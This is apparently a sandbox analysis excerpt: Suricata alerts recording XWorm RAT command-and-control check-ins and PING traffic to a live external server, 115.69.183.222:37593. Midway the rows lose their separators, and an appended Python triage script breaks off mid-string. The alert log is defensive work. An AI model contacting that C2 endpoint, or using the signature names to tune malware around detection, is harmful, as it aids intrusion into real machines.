| 2024-12-10T10:05:20.868343+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.988429+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:20.988429+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.109747+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.109747+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.229755+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.229755+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.349751+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.349751+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.469250+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.469250+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.588749+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.588749+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.709750+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.709750+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.829229+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.829229+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.917850+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:21.917850+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.148168+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.148168+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.269031+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.269031+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.388499+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.388499+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.507997+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.507997+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.617874+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.617874+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.746512+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.746512+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.865936+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.865936+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:22.882125+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP |
| 2024-12-10T10:05:22.882125+0100 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP |
| 2024-12-10T10:05:23.105359+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.105359+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.208331+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.208331+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.328595+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.328595+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.448019+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.448019+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.567924+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.567924+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.687430+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.687430+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.802604+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.802604+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.922164+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:23.922164+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.045611+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.045611+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.165329+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.165329+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.284666+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.284666+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.399411+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.399411+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.530557+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.530557+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.659984+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.659984+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.779401+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.779401+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.898961+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:24.898961+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.018450+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.018450+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.137856+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.137856+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.359880+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.359880+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.479548+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.479548+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.601845+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.601845+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.721165+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.721165+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.842004+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.842004+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.929310+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:25.929310+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.049097+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.049097+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.169325+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.169325+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.204070+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.288740+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.288740+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.527682+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.527682+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.647074+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.647074+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.747572+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 115.69.183.222 | 37593 | 192.168.2.4 | 49751 | TCP |
| 2024-12-10T10:05:26.758670+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49751 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.876964+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:26.876964+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:27.011248+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:27.011248+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:27.146818+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:27.146818+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:27.269718+0100 | 2852873 | ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
| 2024-12-10T10:05:27.269718+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.4 | 49797 | 115.69.183.222 | 37593 | TCP |
                                                                              2024-12-10T10:05:27.390329+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.390329+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.596782+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.596782+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.862581+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.862581+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.982094+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:27.982094+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.142483+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.142483+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.261891+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.261891+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.382436+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.382436+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.624004+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.624004+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.789710+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.789710+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.911765+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:28.911765+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.031215+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.031215+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.152823+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.152823+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.257744+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.257744+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.273973+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.273973+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.393724+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.393724+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.513756+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.513756+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.633791+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.633791+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.753195+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.753195+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.838493+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1115.69.183.22237593192.168.2.449751TCP
                                                                              2024-12-10T10:05:29.899277+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.449797115.69.183.22237593TCP
                                                                              2024-12-10T10:05:29.899277+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449797115.69.183.22237593TCP
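The alert list above is one row per Suricata hit and hides the two things an analyst wants first: which TCP flows alerted (both client ports 49751 and 49797 talk to the same 115.69.183.222:37593 endpoint, and only the 49751 flow has a server-to-client hit), and whether the outbound command alerts recur at a fixed cadence. The script below is an added example and not part of the Joe Sandbox report; it groups the alert rows into per-flow summaries and measures the alert cadence per signature. The fourteen rows embedded in it are copied from the alert table, LOCAL_IP is the analysis host the report shows, and MIN_ALERTS, BIN_S and TOLERANCE are assumptions of this example, not values the report states.

```python
"""Per-flow triage of Suricata alerts taken from a Joe Sandbox report.

Added example, not part of the report. The alert rows are copied from the
report's Suricata table (Dec 10, 2024); the thresholds are assumptions.
"""
from collections import Counter, defaultdict
from datetime import datetime
from statistics import median

LOCAL_IP = "192.168.2.4"   # analysis host, as shown in the report
MIN_ALERTS = 4             # fewest alerts of one signature before a cadence is judged
BIN_S = 0.01               # gaps are bucketed to 10 ms to find the dominant period
TOLERANCE = 0.1            # a gap "fits" if it is within 10 % of a whole multiple of the period

# Rows copied from the report: timestamp|sid|signature|severity|src ip|src port|dst ip|dst port|proto
ALERT_ROWS = """
2024-12-10T10:05:26.049097+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.169325+0100|2852873|ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2|1|192.168.2.4|49797|115.69.183.222|37593|TCP
2024-12-10T10:05:26.169325+0100|2852923|ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)|1|192.168.2.4|49797|115.69.183.222|37593|TCP
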